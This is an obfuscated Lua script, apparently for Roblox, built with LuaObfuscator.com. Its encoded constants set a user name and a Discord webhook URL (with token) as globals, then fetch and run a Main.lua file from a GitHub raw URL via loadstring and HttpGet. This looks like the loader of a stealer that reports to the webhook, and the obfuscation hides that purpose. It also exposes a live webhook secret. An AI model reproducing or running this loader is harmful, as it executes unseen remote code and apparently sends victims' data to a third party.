--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v67=v2(v0(v20,16));if v19 then local v75=v5(v67,v19);v19=nil;return v75;else return v67;end end end);local function v21(v22,v23,v24)if v24 then local v68=0 + (0 -0) ;local v69;while true do if ((0 + 0)==v68) then v69=(v22/((9 -7)^(v23-(306 -((178 -103) + 191 + 39)))))%((2 + 0)^(((v24-(1 + 0)) -(v23-(2 -1))) + 1)) ;return v69-(v69%((1479 -(457 + 1020)) -1)) ;end end else local v70=(1 + (1774 -(1740 + 33)))^(v23-((2 + 1) -2)) ;return (((v22%(v70 + v70))>=v70) and (1996 -(462 + 1533))) or (0 + 0) ;end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -5) ;return (v40 * (366 -(46 + 64))) + v39 ;end local function v27()local v41,v42,v43,v44=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 1 + 3 ;return (v44 * (1134394 + 15642822)) + (v43 * (66774 -(806 + 432))) + (v42 * (8 + (365 -117))) + v41 ;end local function v28()local v45=v27();local v46=v27();local v47=1 -0 ;local v48=(v21(v46,(6 -4) -(1 + 0) ,83 -63 ) * ((4 -2)^(6 + 5 + 21))) + v45 ;local v49=v21(v46,148 -(126 + 1) ,31);local v50=((v21(v46,13 + 19 )==((1124 -609) -(330 + 184))) and  -(1346 -((2792 -(805 + 1031)) + (1251 -862)))) or 1 ;if (v49==0) then if (v48==(0 + (1239 -(155 + 1084)))) then return v50 * (0 + 0) ;else local v76=0 + 0 ;while true do if (0==v76) then v49=184 -(97 + 86) ;v47=584 -(184 + 400) ;break;end end end elseif (v49==(1446 + (861 -(55 + 205)))) then return ((v48==(544 -(408 + 136))) and (v50 * ((43 -(4 + (1982 -(994 + 950))))/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-1023 ) * (v47 + (v48/((1253 -(28 + 1223))^(179 -127)))) ;end local function v29(v30)local v51;if  not v30 then v30=v27();if (v30==(320 -(243 + 77))) then return "";end end v51=v3(v16,v18,(v18 + v30) -(1 + 0) );v18=v18 + v30 ;local v52={};for v65=1 + 0 , #v51 do v52[v65]=v2(v1(v3(v51,v65,v65)));end return v6(v52);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v53=1626 -(1464 + 162) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (0==v53) then v54=0;v55=nil;v53=1;end if (v53~=3) then else v60=nil;while true do local v77=0 -0 ;while true do if (v77==(1 -0)) then if (0~=v54) then else local v94=0 -0 ;while true do if (v94~=(339 -(309 + 28))) then else v54=1;break;end if (v94==0) then local v104=0;while true do if (v104~=(23 -(18 + 4))) then else v94=1;break;end if (v104==(1100 -(869 + 231))) then v55={};v56={};v104=3 -2 ;end end end if (v94~=(1 -0)) then else local v105=0;while true do if (v105==0) then v57={};v58={v55,v56,nil,v57};v105=2 -1 ;end if (v105~=(1 + 0)) then else v94=2;break;end end end end end break;end if (v77==0) then if (v54~=2) then else local v95=0;while true do if (v95==0) then for v109=1,v27() do local v110=783 -(235 + 548) ;local v111;local v112;local v113;while true do if (v110~=1) then else v113=nil;while true do if (v111==(1061 -(642 + 418))) then while true do if (v112~=(820 -(742 + 78))) then else v113=v25();if (v21(v113,1 -0 ,1)==0) then local v155=0;local v156;local v157;local v158;local v159;local v160;while true do if (v155==2) then v160=nil;while true do if (2==v156) then while true do if ((1 + 0)==v157) then local v175=0;local v176;while true do if (v175==(0 -0)) then v176=0;while true do if (v176~=0) then else local v186=0;while true do if (1==v186) then v176=1;break;end if (v186==(0 + 0)) then v160={v26(),v26(),nil,nil};if (v158==0) then local v191=0;local v192;while true do if (v191~=0) then else v192=0 + 0 ;while true do if ((1675 -(931 + 744))==v192) then v160[3]=v26();v160[3 + 1 ]=v26();break;end end break;end end elseif (v158==1) then v160[2 + 1 ]=v27();elseif (v158==(343 -(173 + 168))) then v160[3]=v27() -(2^16) ;elseif (v158==(2 + 1)) then local v197=0;local v198;while true do if (v197==0) then v198=0;while true do if (v198~=(0 -0)) then else v160[1487 -(81 + 1403) ]=v27() -((3 -1)^(11 + 5)) ;v160[12 -8 ]=v26();break;end end break;end end end v186=1;end end end if (v176==(682 -(302 + 379))) then v157=164 -(133 + 29) ;break;end end break;end end end if (v157~=2) then else local v177=0 -0 ;local v178;while true do if (v177~=0) then else v178=1323 -(904 + 419) ;while true do if (v178~=(0 -0)) then else if (v21(v159,1,2 -1 )==(1072 -(605 + 466))) then v160[2 + 0 ]=v60[v160[1 + 1 ]];end if (v21(v159,6 -4 ,2)~=(814 -(6 + 807))) then else v160[3]=v60[v160[3]];end v178=1;end if (v178==(1 + 0)) then v157=6 -3 ;break;end end break;end end end if (v157==0) then local v179=0 -0 ;while true do if (v179==(1 + 0)) then v157=1;break;end if (v179~=(0 + 0)) then else v158=v21(v113,4 -2 ,1 + 2 );v159=v21(v113,2 + 2 ,6);v179=1;end end end if (v157~=(4 -1)) then else if (v21(v159,5 -2 ,1480 -(942 + 535) )~=(302 -(44 + 257))) then else v160[11 -7 ]=v60[v160[4]];end v55[v109]=v160;break;end end break;end if (v156==(0 -0)) then v157=0;v158=nil;v156=2 -1 ;end if (v156~=1) then else local v172=0;local v173;while true do if (v172~=(0 -0)) then else v173=0;while true do if (v173==1) then v156=2 -0 ;break;end if (v173==(1695 -(180 + 1515))) then local v185=0 + 0 ;while true do if (v185~=(1 + 0)) then else v173=2 -1 ;break;end if (v185==0) then v159=nil;v160=nil;v185=1;end end end end break;end end end end break;end if (v155==0) then v156=0 -0 ;v157=nil;v155=1 + 0 ;end if (v155==(1700 -(145 + 1554))) then local v165=0;while true do if (v165~=0) then else v158=nil;v159=nil;v165=1108 -(629 + 478) ;end if (v165==1) then v155=1275 -(720 + 553) ;break;end end end end end break;end end break;end if (v111~=0) then else local v143=0 -0 ;while true do if (0~=v143) then else v112=889 -(582 + 307) ;v113=nil;v143=1 + 0 ;end if (v143==1) then v111=1;break;end end end end break;end if (v110~=0) then else v111=0;v112=nil;v110=1978 -(844 + 1133) ;end end end for v114=365 -(106 + 258) ,v27() do v56[v114-(1761 -(714 + 1046)) ]=v33();end v95=1;end if (v95~=1) then else for v116=1 + 0 ,v27() do v57[v116]=v27();end return v58;end end end if (v54==1) then local v96=0 -0 ;while true do if (v96==(6 -4)) then v54=1 + 1 ;break;end if (v96~=0) then else local v106=0;while true do if (v106~=(0 -0)) then else v59=v27();v60={};v106=1;end if ((656 -(541 + 114))~=v106) then else v96=1393 -(685 + 707) ;break;end end end if (v96==1) then local v107=0 + 0 ;while true do if (v107~=(0 -0)) then else for v121=1,v59 do local v122=326 -(55 + 271) ;local v123;local v124;while true do if ((0 + 0)~=v122) then else local v144=0 + 0 ;local v145;while true do if (v144~=(890 -(843 + 47))) then else v145=0 + 0 ;while true do if ((0 -0)~=v145) then else v123=v25();v124=nil;v145=3 -2 ;end if (v145~=1) then else v122=1;break;end end break;end end end if (1~=v122) then else if (v123==1) then v124=v25()~=0 ;elseif (v123==(5 -3)) then v124=v28();elseif (v123~=(824 -(464 + 357))) then else v124=v29();end v60[v121]=v124;break;end end end v58[3]=v25();v107=3 -2 ;end if (v107~=(1 + 0)) then else v96=2 -0 ;break;end end end end end v77=1;end end end break;end if (v53~=(1 + 0)) then else local v71=0 -0 ;while true do if (v71==(1 + 0)) then v53=2;break;end if (v71~=(0 -0)) then else v56=nil;v57=nil;v71=3 -2 ;end end end if (v53==(67 -(34 + 31))) then v58=nil;v59=nil;v53=1 + 2 ;end end end local function v34(v35,v36,v37)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v35[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (v78==0) then v79=1;v80= -1;v78=1;end if (v78==3) then A,B=v32(v11(v83));if  not A[1] then local v97=v35[4][v79] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v78==2) then v83=nil;v83=function()local v84=v62;local v85=v63;local v86=v64;local v87=v32;local v88={};local v89={};local v90={};for v98=0 -0 ,v82 do if ((v98>=v86) or ((1013 + 1644)<((6967 -(677 + 786)) -4168))) then v88[v98-v86 ]=v81[v98 + 1 ];else v90[v98]=v81[v98 + 1 ];end end local v91=(v82-v86) + ((1293 -(241 + 549)) -(227 + 275)) ;local v92;local v93;while true do local v99=1809 -(1083 + 726) ;while true do if (((1551 -(64 + 634))<((6522 -3759) -(16 + 132))) and (v99==(2 -1))) then if ((v93<=(3 + 1)) or (4156<=(4283 -3385))) then if ((((5035 -(1098 + 781)) -(1155 + 279))>=(129 -(153 -113))) and (v93<=(1563 -(923 + 639)))) then if ((v93>(1470 -(1059 + 313 + 98))) or (439>=2795)) then local v125=(0 + 0) -0 ;local v126;local v127;local v128;local v129;while true do if ((v125==(2 + 0)) or (((7561 -4370) -(581 + 197))==(3914 -(489 + (2020 -1362))))) then while true do if ((v126==(0 -0)) or ((664 + 723)>=(3863 -(523 + 1229)))) then local v161=0;while true do if ((v161==((1999 -(1577 + 422)) -0)) or ((1255 + 3445)==(3709 -(1488 + 464)))) then v127=(1712 -1138) -(334 + 240) ;v128=nil;v161=1 -(0 -0) ;end if ((2932<(829 + 2888)) and (v161==(1147 -(28 + 1118)))) then v126=1246 -(1241 + 4) ;break;end end end if ((v126==(1124 -(1046 + 77))) or ((365 + 107 + 2)==(2608 -((2591 -(297 + 1228)) + 1 + 136)))) then v129=nil;while true do if (((2599 -(301 + 328))==((2423 -(438 + 34)) + 19)) and (v127==(1557 -((564 -(242 + 236)) + 1470)))) then v90[v128 + 1 ]=v129;v90[v128]=v129[v92[576 -(303 + 269) ]];break;end if ((3242==(7753 -(8398 -3887))) and (v127==(907 -(870 + 37)))) then local v169=0;while true do if ((2615==(2360 + 255)) and (v169==(0 -0))) then local v174=(0 + 0) -0 ;while true do if ((((496 + 6298) -4436)<=(1295 + 1445)) and (v174==1)) then v169=(255 -134) -(115 + 5) ;break;end if ((v174==(0 + 0)) or ((21794 -17383)<(337 + 15 + 9))) then v128=v92[1 + 1 ];v129=v90[v92[6 -(8 -5) ]];v174=939 -(661 + (830 -553)) ;end end end if ((v169==(1 + 0)) or ((2008 -954)<(1136 -(45 + (280 -(160 + 77)))))) then v127=(645 + 593) -((1185 -(81 + 36)) + 169) ;break;end end end end break;end end break;end if ((((1639 + 2138) -2285)<3387) and (1==v125)) then v128=nil;v129=nil;v125=2 + 0 ;end if ((((12367 -(733 + 1143)) -7371)==(3078 + 42)) and (v125==(0 -0))) then v126=0 -0 ;v127=nil;v125=1 + 0 ;end end else v90[v92[2]]=v92[5 -(1 + 1) ];end elseif ((v93<=(75 -((916 -(188 + 674)) + 19))) or ((2171 + 358)==(15150 -10853))) then local v132=0 + 0 ;local v133;local v134;local v135;local v136;while true do if (((571 + 1211)>=169) and (v132==(747 -((497 -(130 + 216)) + 85 + 511)))) then local v149=0;while true do if ((v149==(666 -(588 + 78))) or ((4907 -870)==(4299 -(441 + 255 + 370)))) then v133=v92[377 -(72 + 15 + 107 + 181) ];v134,v135=v87(v90[v133](v13(v90,v133 + (3 -2) ,v92[707 -(432 + 272) ])));v149=1;end if ((v149==((6 -3) -2)) or ((3666 -((1235 -910) + 157))<=619)) then v132=4 -3 ;break;end end end if ((v132==(3 -2)) or ((11325 -(2826 + 3921))<=(7350 -4116))) then local v150=224 -(65 + 159) ;while true do if ((3062>(8171 -5410)) and (v150==1)) then v132=(2 -1) + 1 ;break;end if ((((0 -0) + 0)==v150) or ((2769 -1871)<=(4 + 0))) then v80=(v135 + v133) -(1 + 0) ;v136=275 -(205 + 70) ;v150=3 -2 ;end end end if (((6399 -3127)==(4221 -(686 + 263))) and (2==v132)) then for v151=v133,v80 do local v152=0 -0 ;local v153;while true do if ((3107>(1855 -981)) and (v152==(0 + 0))) then v153=1658 -(1338 + 320) ;while true do if ((v153==(1150 -(1026 + 124))) or ((442 + 2740)>(4915 -(1322 + 101)))) then v136=v136 + 1 + 0 ;v90[v151]=v134[v136];break;end end break;end end end break;end end elseif ((v93==(6 -3)) or ((6480 -2736)==(1530 -975))) then v90[v92[2 -0 ]]();elseif ((((101 + 10456) -6081)<=(6011 -(220 + 1121))) and (v90[v92[1642 -(1351 + 289) ]]==v92[4])) then v79=v79 + (1 -0) ;else v79=v92[894 -(517 + 22 + 352) ];end elseif ((v93<=(122 -(109 + (20 -13)))) or ((173 + 208)>=((3517 -(1491 + 237)) + 1134))) then if ((2594==(2826 -(91 + 141))) and (v93==5)) then local v137=0 -0 ;local v138;local v139;while true do if (((4598 -(9 + 325))>(6658 -3615)) and (0==v137)) then v138=0;v139=nil;v137=(2 -1) + 0 ;end if ((((195 + 6717) -4762)==2150) and (v137==((1160 -(372 + 650)) -(106 + 31)))) then while true do if (((1241 + 1547)==(8587 -5799)) and (v138==(0 + 0))) then v139=v92[5 -3 ];v90[v139]=v90[v139](v13(v90,v139 + ((3394 -(137 + 1571)) -(461 + 1224)) ,v80));break;end end break;end end else v79=v92[1460 -(1365 + 92) ];end elseif ((v93<=7) or (1793>=(171 + 3551))) then v37[v92[4 -(1 + 0) ]]=v90[v92[2 -(856 -(16 + 840)) ]];elseif ((v93==(102 -(46 + 48))) or (3495<=(4083 -2874))) then do return;end else v90[v92[2]]=v37[v92[2 + 1 ]];end v79=v79 + (2 -(4 -3)) ;break;end if ((v99==0) or ((9143 -(5895 + 621))>=(6158 -(785 + 461)))) then local v108=1547 -(167 + 789 + 591) ;while true do if ((4668<(1130 + 3563)) and ((1 -0)==v108)) then v99=1 + 0 ;break;end if ((v108==((0 -0) -0)) or ((1016 + 453)==(665 -183))) then v92=v84[v79];v93=v92[1];v108=1;end end end end end end;v78=3;end if (v78==1) then v81={...};v82=v12("#",...) -1 ;v78=2;end end end;end if (v61==0) then v62=v35[1];v63=v35[2];v61=1;end end end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756103083O00557365724E616D6503083O00756C6162756C616B03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313038373036373031363034323634333439362F596641786536726E594A335F357670686B494E466A36316A7A4D3754784765714D784F66382D4E4970564C71395153656137687035327041794C764B424E30624B58337900143O00124O00013O0026043O000B000100020004063O000B0001001209000100033O001209000200043O00200100020002000500122O000400064O0002000200044O000500013O00022O00030001000100010004063O001300010026043O0001000100010004063O0001000100122O000100083O001207000100073O00122O0001000A3O001207000100093O00124O00023O0004063O000100012O00083O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
